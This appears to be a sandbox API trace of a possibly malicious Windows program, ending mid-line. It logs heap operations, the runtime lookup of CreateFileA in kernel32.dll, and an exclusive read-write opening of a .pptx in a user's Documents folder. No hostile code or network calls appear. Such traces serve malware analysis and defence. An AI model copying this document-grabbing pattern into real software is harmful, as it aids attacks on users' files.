[0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.068] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.071] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0171.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd708 [0171.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd708, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.071] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0171.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0171.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.072] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0171.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0171.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0171.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3e) returned 0x8db0a8 [0171.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", cchWideChar=62, lpMultiByteStr=0x8db0a8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpUsedDefaultChar=0x0) returned 62 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.073] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k55l_7um1tyjpsga.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7c) returned 0x9c0b78 [0171.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=62, lpWideCharStr=0x9c0b78, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx") returned 62 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.077] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 